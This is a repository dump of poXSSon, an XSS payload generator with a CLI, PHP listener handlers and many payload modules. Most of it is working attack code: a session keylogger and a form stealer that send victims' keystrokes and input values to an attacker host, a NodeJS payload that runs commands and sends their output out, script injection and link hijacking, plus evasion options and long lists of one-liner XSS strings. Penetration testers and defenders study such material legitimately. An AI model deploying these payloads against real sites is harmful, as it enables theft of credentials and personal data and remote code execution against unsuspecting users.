├── LICENSE ├── README.md ├── lib └── handler.py ├── payloads ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-37.pyc │ ├── add_script.cpython-37.pyc │ ├── alert.cpython-37.pyc │ ├── cmd_exec.cpython-37.pyc │ ├── form_stealer.cpython-37.pyc │ ├── hide.cpython-37.pyc │ ├── img_replace.cpython-37.pyc │ ├── info.cpython-37.pyc │ ├── keylogger.cpython-37.pyc │ ├── link_replace.cpython-37.pyc │ ├── session_keylogger.cpython-37.pyc │ └── storage.cpython-37.pyc ├── add_script.py ├── alert.py ├── cmd_exec.py ├── form_stealer.py ├── hide.py ├── img_replace.py ├── info.py ├── keylogger.py ├── link_replace.py ├── random.py ├── random_confirm.py ├── session_keylogger.py ├── shortest.py └── storage.py ├── php_handler_dir ├── abc └── handler.php ├── poxsson-logo.svg ├── poxsson.py ├── random_confirm_payloads.txt ├── random_payloads.txt └── requirements.txt /LICENSE: -------------------------------------------------------------------------------- 1 | ISC License 2 | 3 | Copyright (c) 2022 Red Code Labs 4 | 5 | Permission to use, copy, modify, and/or distribute this software for any 6 | purpose with or without fee is hereby granted, provided that the above 7 | copyright notice and this permission notice appear in all copies. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 10 | WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 11 | MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 12 | ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 13 | WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 14 | ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 15 | OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # poXSSon 2 | 3 |

10 | Create, encode and deploy complex JS payloads. 11 |

14 | 15 | 16 | ## What is this project? 17 | This tool gathers some of the most reliable and useful JavaScript payloads that can be used in client-side attacks or while testing the security posture of a web application. 18 | They can be adapted and modified to your specific needs. 19 | 20 | ## Installation 21 | All of the required deps can be easily installed via the command: 22 | 23 | ```pip install -r requirements.txt``` 24 | 25 | ## Project details 26 | 27 | ### MultiplePayloads() 28 | Choose from several code templates to grab keystrokes, execute system commands and exfiltrate important data from the target host. Save the generated payload to a file or clipboard for further use. 29 | 30 | ### HighlyEVasive() 31 | Specify encoding schemes, custom script tags, format conversions and polyglot executors using an intuitive command-line interface. 32 | 33 | ### FullyCustomizable() 34 | An Msfvenom-like approach to specifying options enables you to quickly tweak any payload. Every aspect of the payload's logic can be modified, allowing unique behaviour depending on what system you target. 35 | 36 | ### RealTimeMonitoring() 37 | Most payloads come with a built-in PHP handler that can be launched after generating the code template. It listens for status messages and data harvested by the launched payload. 38 | 39 | ### More info 40 | More info about poXSSon and its usage can be found in our blog post: [JS Payloads in 2021](https://redcodelabs.io/2021/11/28/js-payloads-in-2021.html). 41 | 42 | ## Contribute 43 | Contributions are always welcome! 
44 | -------------------------------------------------------------------------------- /lib/handler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | from http.server import HTTPServer, BaseHTTPRequestHandler 3 | 4 | class DefaultHandler(BaseHTTPRequestHandler): 5 | def do_GET(self): 6 | print(self.path) 7 | #self.send_response(200) 8 | #self.end_headers() 9 | #self.wfile.write(b'Hello, world!') 10 | 11 | def start_handler(port, log, outfile): 12 | httpd = HTTPServer(('localhost', 8000), SimpleHTTPRequestHandler) 13 | httpd.serve_forever() 14 | -------------------------------------------------------------------------------- /payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__init__.py -------------------------------------------------------------------------------- /payloads/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/add_script.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/add_script.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/alert.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/alert.cpython-37.pyc 
-------------------------------------------------------------------------------- /payloads/__pycache__/cmd_exec.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/cmd_exec.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/form_stealer.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/form_stealer.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/hide.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/hide.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/img_replace.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/img_replace.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/info.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/info.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/keylogger.cpython-37.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/keylogger.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/link_replace.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/link_replace.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/session_keylogger.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/session_keylogger.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/storage.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/storage.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/add_script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="add_script" 3 | description="Append external script to the top of the 'head' tag of the site as child element" 4 | options = [['URL', "URL of the external script", ""]] 5 | 6 | payload = """ 7 | 8 | var script=document.createElement('script'); 9 | script.type='text/javascript'; 10 | script.src='URL'; 11 | document.getElementsByTagName('head')[0].appendChild(script); 12 | 13 | """ 14 | -------------------------------------------------------------------------------- /payloads/alert.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="alert" 3 | description="Print alert message" 4 | options=[["MESSAGE", "Alert message to print", "alert!"]] 5 | payload = """ 6 | alert('MESSAGE') 7 | """ 8 | -------------------------------------------------------------------------------- /payloads/cmd_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | import socket 3 | def local_ip(): 4 | try: 5 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 6 | s.connect(("8.8.8.8", 80)) 7 | return s.getsockname()[0] 8 | except: 9 | return "N/A" 10 | name="cmd_exec" 11 | description="Executes command using NodeJS's execSync function" 12 | options = [["LHOST", "Host with listening handler", local_ip()], 13 | ["CMD", "Command to execute", "ls"]] 14 | handler_options = [["LOGFILE", "File to store logged data", "cmd_output.txt"]] 15 | payload = """ 16 | 17 | const execSync = require('child_process').execSync; 18 | const output = execSync('CMD', { encoding: 'utf-8' }); 19 | const executed_command = 'CMD'; 20 | new Image().src = "http://LHOST:8000/handler.php?output="+output+"?executed_command="+executed_command; 21 | """ 22 | 23 | handler = """ 24 | 29 | """ 30 | -------------------------------------------------------------------------------- /payloads/form_stealer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | import socket 3 | def local_ip(): 4 | try: 5 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 6 | s.connect(("8.8.8.8", 80)) 7 | return s.getsockname()[0] 8 | except: 9 | return "N/A" 10 | name="form_stealer" 11 | description="Steals all the values set in forms and sends them away through an image src" 12 | options = [["LHOST", "Host to send captured strokes to", local_ip()]] 13 | handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]] 14 | 15 
| payload = """ 16 | document.getElementsByTagName("body")[0].setAttribute("onunload","postData()"); 17 | 18 | function postData() { 19 | 20 | var output = "page="+document.location; 21 | var inputs, index; 22 | 23 | inputs = document.getElementsByTagName('input'); 24 | for (index = 0; index < inputs.length; ++index) { 25 | input_name = inputs[index].id || inputs[index].name; 26 | output = output + "&" + input_name + "=" + inputs[index].value; 27 | } 28 | 29 | output = encodeURI(output); 30 | new Image().src = "http://LHOST:8000/handler.php?"+output; 31 | 32 | }""" 33 | 34 | handler = """ 35 | $value){ 48 | if ($key == "page"){} else { 49 | $form_line = sprintf("\nName: %s Value: %s", $key, $value); 50 | } 51 | $f=fopen("LOGFILE","a+"); 52 | fwrite($f, $form_line); 53 | fclose($f); 54 | } 55 | ?> 56 | """ 57 | -------------------------------------------------------------------------------- /payloads/hide.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="hide" 3 | description="Hides specified element on the page" 4 | options = [['ELEMENT_ID', "ID of the element to hide", ""]] 5 | 6 | payload = """ 7 | var p = document.getElementById('ELEMENT_ID'); 8 | p.style.display = 'none'; 9 | 10 | """ 11 | -------------------------------------------------------------------------------- /payloads/img_replace.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="img_replace" 3 | description="Replace all images on site with an image pointed to by URL" 4 | options = [["URL", "URL of the new image", ""]] 5 | 6 | payload = """ 7 | var imgs = document.getElementsByTagName("img"); 8 | for(var i=0, l=imgs.length; i 41 | """ 42 | -------------------------------------------------------------------------------- /payloads/link_replace.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | 
name="link_replace" 3 | description="Replaces all links on page" 4 | options = [['URL', "URL to replace the links with", "http://example.com"]] 5 | 6 | payload = """ 7 | Array.from(document.getElementsByTagName("a")).forEach(function(i) { 8 | i.href = "URL"; 9 | }); 10 | """ 11 | 12 | -------------------------------------------------------------------------------- /payloads/random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import random 3 | name="random" 4 | description="Chooses a random one-liner payload for blind testing backend's input validation" 5 | options = [[]] 6 | payload = random.choice(open('random_payloads.txt').readlines()) 7 | -------------------------------------------------------------------------------- /payloads/random_confirm.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import random 3 | name="random_confirm" 4 | description="Chooses a random one-liner 'confirm()' payload. 
An alternative to standard 'alert()'" 5 | options = [[]] 6 | payload = random.choice(open('random_confirm_payloads.txt').readlines()) 7 | -------------------------------------------------------------------------------- /payloads/session_keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | import socket 3 | def local_ip(): 4 | try: 5 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 6 | s.connect(("8.8.8.8", 80)) 7 | return s.getsockname()[0] 8 | except: 9 | return "N/A" 10 | name="session_keylogger" 11 | description="A keylogger which follows user sessions thanks to an ID set into a cookie" 12 | options = [["LHOST", "Host to send captured strokes to", local_ip()], 13 | ["INTERVAL", "Number of seconds after which captured keystrokes are sent", "10"], 14 | ["TRACK_KEYS", "Track keystrokes", "true"], 15 | ["TRACK_MOUSE", "Track mouse movement", "false"], 16 | ["TRACK_CLICKS", "Track mouse clicks", "false"], 17 | ["COOKIE_NAME", "Name of the cookie shown in the browser", "cook"], 18 | ["COOKIE_LIFETIME", "Lifetime of cookie in days", "1"]] 19 | handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]] 20 | 21 | payload = """ 22 | 23 | function Keylogger(){ 24 | //Bufers 25 | 26 | 27 | /* 28 | * Configuration of the keylogger 29 | ****** 30 | * track_keys : True if one wants to track the key pressed 31 | * track_mouse : True if one wants to track the movements of mouse 32 | * track_clicks : true if one wants to track the click 33 | * send_interval_s : interval to send the request to the server (in second) 34 | * distant_server : address of the server 35 | * cookie_name : Name of the cookie in the browser 36 | * cookie_lifetime : Lifetime of the cookie in days 37 | */ 38 | this.keylog_configuration={ 39 | track_keys: TRACK_KEYS, 40 | track_mouse: TRACK_MOUSE, 41 | track_clicks: TRACK_CLICKS, 42 | send_interval_s: INTERVAL, 43 | 
distant_server:'http://LHOST:8000/handler.php', 44 | cookie_name:'COOKIE_NAME', 45 | cookie_lifetime: COOKIE_LIFETIME 46 | }; 47 | /* 48 | * Function that generates a GUID (but not a strong one) 49 | */ 50 | this.S4=function() { 51 | return (((1+Math.random())*0x10000)|0).toString(16).substring(1); 52 | }; 53 | 54 | /* 55 | * Constructor-like function 56 | * Initialize elements to the right values 57 | */ 58 | this.begin=function(){ 59 | 60 | var guid_in_cookies; 61 | var i,x,y,ARRcookies=document.cookie.split(";"); 62 | for (i=0;i0){ 74 | this.guid=guid_in_cookies; 75 | } 76 | else{ 77 | /* Create the GUID */ 78 | this.guid= (this.S4()+this.S4()+"-"+this.S4()+"-"+ 79 | this.S4()+"-"+this.S4()+"-"+this.S4()+ 80 | this.S4()+this.S4()); 81 | 82 | /* Cookie setup*/ 83 | var exdate = new Date(); 84 | var exdays = this.keylog_configuration.cookie_lifetime; 85 | exdate.setDate(exdate.getDate() +exdays ); 86 | 87 | var c_value=escape(this.guid) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); 88 | document.cookie=this.keylog_configuration.cookie_name + "=" + c_value; 89 | } 90 | this.from_page=encodeURIComponent(window.location.href); 91 | this.transfer_buffer(); 92 | //alert("Method had been called" + this.property1); 93 | }; 94 | /* 95 | * Insert a key 96 | */ 97 | this.insert_key=function(event){ 98 | var new_char=''; 99 | if(event.altKey){ 100 | new_char = '{{Alt}}'; 101 | }else if(event.ctrlKey){ 102 | new_char = '{{Ctrl}}'; 103 | }else if(event.shiftKey){ 104 | new_char = '{{Shift}}'; 105 | } 106 | if(event.keyCode!=null){ 107 | if(event.keyCode){ 108 | new_char=new_char+this.decodeChar(event.keyCode); 109 | }else{ 110 | new_char=new_char+this.decodeChar(event.charCode); 111 | } 112 | } 113 | 114 | this.buffer_text_current=this.buffer_text_current+new_char; 115 | }; 116 | 117 | /* 118 | * Decode special characters. 
119 | */ 120 | this.decodeChar=function(code){ 121 | var charac; 122 | switch(code){ 123 | case 8: 124 | charac='{{Backspace}}'; 125 | break; 126 | case 9: 127 | charac='{{Tab}}'; 128 | break; 129 | case 13: 130 | charac='{{Enter}}'; 131 | break; 132 | case 33: 133 | break; 134 | case 37: 135 | charac='{{<-}}'; 136 | break; 137 | case 38: 138 | charac='{{up}}'; 139 | break; 140 | case 39: 141 | charac='{{->}}'; 142 | break; 143 | case 40: 144 | charac='{{down}}'; 145 | break; 146 | case 46: 147 | charac='{{delete}}'; 148 | break; 149 | case 91: 150 | charac='{{leftWindow}}'; 151 | break; 152 | case 92: 153 | charac='{{rightWindow}}'; 154 | break; 155 | case 154: 156 | charac='{{PrtScreen}}'; 157 | break; 158 | default: 159 | charac=String.fromCharCode(code); 160 | break; 161 | } 162 | return charac; 163 | }; 164 | /* 165 | * 166 | */ 167 | this.insert_click=function(event){ 168 | // Nothing at the moment 169 | }; 170 | /* 171 | * 172 | */ 173 | this.send_infos=function(){ 174 | var parameters='?frompage='+this.from_page; 175 | parameters =parameters + '&guid='+this.guid; 176 | parameters = parameters + '&text='+encodeURIComponent(this.buffer_text_to_send); 177 | var address_to_call=this.keylog_configuration.distant_server+parameters; 178 | //We just preload the image without actually inserting it 179 | image01= new Image(); 180 | image01.src=address_to_call; 181 | }; 182 | /* 183 | * Swap values 184 | */ 185 | this.transfer_buffer=function(){ 186 | this.buffer_text_to_send=this.buffer_text_current; 187 | this.buffer_text_current=''; 188 | this.send_infos(); 189 | 190 | var t = setTimeout('logger.transfer_buffer()',this.keylog_configuration.send_interval_s*1000); 191 | }; 192 | 193 | 194 | this.buffer_text_current='[Begin session]', 195 | this.buffer_text_to_send='', 196 | //Important information 197 | this.guid='UNDEFINED', 198 | this.from_page='UNDEFINED'; 199 | 200 | 201 | } 202 | var logger = new Keylogger(); 203 | /* 204 | * Launch the logger 205 | */ 206 | 
function launch(){ 207 | logger.begin(); 208 | //binding for key pressed 209 | if(logger.keylog_configuration.track_keys){ 210 | if (navigator.appName == 'Microsoft Internet Explorer') 211 | { 212 | document.body.attachEvent('onkeypress',process_key); 213 | }else{ 214 | //Binding for everything but ie 215 | document.addEventListener('keypress',process_key,false); 216 | 217 | //document.body.setAttribute('onKeyPress','Keylogger.insert_key(event)'); 218 | } 219 | } 220 | //Binding for click 221 | if(logger.keylog_configuration.track_clicks){ 222 | //Binding for everything but ie 223 | //document.body.setAttribute('onclick','Keylogger.insert_click(event)'); 224 | } 225 | } 226 | 227 | function process_key(event){ 228 | logger.insert_key(event); 229 | }""" 230 | 231 | handler = """ 232 | 233 | 248 | 249 | """ 269 | -------------------------------------------------------------------------------- /payloads/shortest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | name="shortest" 3 | description="The shortest payload for XSS injection" 4 | payload = """", 30 | "2" : "\"'-->", 31 | "3" : "'\"-->", 32 | "4" : "\"'>-->*/" , 33 | "5" : "\"'-->", 34 | "6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*`""" 35 | } 36 | 37 | 38 | #Obtains local IP for use with handler 39 | def local_ip(): 40 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 41 | s.connect(("8.8.8.8", 80)) 42 | return s.getsockname()[0] 43 | 44 | def print_banner(): 45 | print("") 46 | print("") 47 | print(green("{_______ {__ {__ {__ __ {__ __")) 48 | print(green("{__ {__ {__ {__ {__ {__{__ {__ ")) 49 | print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ ")) 50 | print(green("{_______ {__ {__ {__ {__ {__ {__ {__ {__ {__")) 51 | print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ {__")) 52 | print(green("{__ {__ {__ {__ {__ {__ {__{__ {__ {__ {__ {__ {__")) 53 | print(green("{__ {__ {__ {__ {__ __ {__ __ {__ {___ {__ ")) 54 | print("") 55 | 56 | 
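#Function for printing metasploit-like tables ;>
def print_table(table_data):
    """Print *table_data* as a borderless, msf-style table.

    table_data is a list of rows whose first row holds the column titles.
    A row of dashes (one per title, as wide as the title) is rendered under
    the heading. The caller's list is left untouched; the previous version
    inserted the dash row into it as a side effect.
    """
    if not table_data:
        return
    heading = table_data[0]
    underline = ["-" * len(title) for title in heading]
    rows = [heading, underline, *table_data[1:]]
    table_instance = SingleTable(rows)
    #All borders off so the output looks like msfconsole's option tables
    table_instance.inner_heading_row_border = False
    table_instance.inner_row_border = False
    table_instance.inner_column_border = False
    table_instance.outer_border = False
    table_instance.justify_columns = {0: 'left', 1: 'left', 2: 'left'}
    print(table_instance.table)
    print('')

#Simply lists files under /payloads dir and prints info about them in color
def list_payloads():
    """List the available payload modules, polyglot triggers and polyglots.

    Every top-level ``*.py`` file in ``POXSSON_PATH + 'payloads'`` (except
    ``__init__.py``) is imported as ``payloads.<name>`` and its ``name``,
    ``description``, handler presence and payload length are tabulated.
    Importing runs each file's module-level code (e.g. the ``local_ip()``
    call in the handler-backed payloads), so only trusted files belong in
    that directory.
    """
    table_data = [["Name", "Description", "Handler", "Length"]]
    payload_dir = POXSSON_PATH + 'payloads'
    #Only the top level of the directory is scanned; a missing directory
    #yields an empty listing instead of an IndexError
    _, _, file_names = next(os.walk(payload_dir), (payload_dir, [], []))
    plds = []
    for file_name in sorted(file_names):
        #__init__.py, .pyc files and anything that is not a module are skipped
        if 'init' in file_name or not file_name.endswith('.py'):
            continue
        #Each payload is imported and treated as a module
        plds.append(importlib.import_module("payloads." + file_name[:-3]))
    for pl in plds:
        table_data.append([red(pl.name), blue(pl.description),
                           hasattr(pl, "handler"), len(pl.payload)])
    print(info(f"Available payloads: {len(plds)}"))
    print("")
    print_table(table_data)
    print("")
    #The heading goes into a fresh list so the module-level trigger list is
    #not mutated and the printed count does not include the heading row
    print(info(f"Available triggers: {len(polyglot_triggers)}"))
    print("")
    print_table([["Name", "Compatibility", "Description"], *polyglot_triggers])
    print("")
    print(good(f"Available polyglots: {len(polyglots)}"))
    for idn, template in polyglots.items():
        highlighted = template.replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))
        print(f"[{idn}] -> {highlighted}")
    print("")

#Shows info (options, description, size...) about payload selected with "--payload" flag
def print_payload_info(payload_mod):
    """Print the name, description, length, handler flag and option tables of a payload module.

    Option entries are ``[NAME, DESCRIPTION, DEFAULT_VALUE]`` lists (the
    layout insert_options relies on, reading index 2 as the value).
    Modules lacking ``options``, ``handler_options`` or ``handler`` are
    reported as having none; malformed entries such as the ``[[]]``
    placeholder in random.py are skipped instead of aborting the listing.
    """
    payload_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
    handler_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
    has_handler = hasattr(payload_mod, "handler")
    for opt in getattr(payload_mod, "options", []):
        if len(opt) >= 3:
            payload_options_table_data.append([opt[0], opt[1], opt[2]])
    for opt in getattr(payload_mod, "handler_options", []):
        if len(opt) >= 3:
            handler_options_table_data.append([opt[0], opt[1], opt[2]])
    #Prints all obtained data with f"" prefix formatting
    print(info(f"Name: {payload_mod.name}"))
    print(info(f"Description: {payload_mod.description}"))
    print(info(f"Length: {len(payload_mod.payload)} bytes"))
    print(info(f"Handler: {has_handler}"))
    #Every other call site prints info()'s return value; the bare
    #info("...") calls previously used here dropped the headings silently
    if len(payload_options_table_data) > 1:
        print("")
        print(info("Payload options:"))
        print("")
        print_table(payload_options_table_data)
    if len(handler_options_table_data) > 1:
        print("")
        print(info("Handler options:"))
        print("")
        print_table(handler_options_table_data)

#def test_payload(payload_name):
#    pass

#I was so high writing this function lol
#But I suppose it just copies a PHP handler to a directory (?)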
154 | #And launches it from there using PHP inline interpreter 155 | def start_php_handler(php_code): 156 | #subprocess.call(f"touch {POXSSON_PATH}php_handler_dir/handler.php", shell=True) 157 | with open(f"{POXSSON_PATH}php_handler_dir/handler.php", "w+") as handler_file: 158 | handler_file.write(php_code) 159 | handler_file.close() 160 | subprocess.call(f"php -t {POXSSON_PATH}php_handler_dir -S {local_ip()}:8000", shell=True) 161 | subprocess.call(f"rm -rf {POXSSON_PATH}php_handler_dir", shell=True) 162 | 163 | #Inserts default options, and also options passed as NAME=VAL in command line 164 | def insert_options(payload_code, payload_options, cli_options): 165 | pc = payload_code 166 | for option in cli_options: 167 | name = option.split("=")[0].upper() 168 | value = option.split("=")[1] 169 | pc = pc.replace(name.upper(), value) 170 | for option in payload_options: 171 | name = option[0] 172 | value = option[2] 173 | if (value == "" and "=" in ''.join(cli_options)): 174 | print(info(f"{name.upper()} option is empty")) #Warns if you forgot to set something 175 | #if name.upper() not in payload_code: 176 | #logs.err("No such option") 177 | #sys.exit() 178 | if name.lower() not in ''.join(cli_options): 179 | pc = pc.replace(name.upper(), value) 180 | #try: 181 | #except: 182 | return pc 183 | 184 | 185 | def arguments(): 186 | parser = argparse.ArgumentParser(prog="poxsson") 187 | wrapping = parser.add_argument_group() 188 | #wrapping_group = wrapping.add_mutually_exclusive_group() 189 | parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs means that 0 or mor arguments of this type can be passed 190 | parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads') 191 | parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='', help='Specify the payload') 192 | parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity') 
193 | parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info') 194 | parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion') 195 | parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard') 196 | parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='', help='Save payload to a file') 197 | parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='', help='Execute payload after specific period of time (seconds, minutes, hours)') 198 | parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='', help='Encode payload') 199 | parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='', help="Use specific (or random) separator between tag and first parameter") 200 | #Separate group for executable wrappers (it just looks more clear imho) 201 | wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload") 202 | wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic 16 | 17 | 18 | 19 | 20 | 88 | 91 | 92 | click 93 | 94 | 101 | 102 | 103 | 106 | --!> 111 | 112 |
x 113 | "> 114 |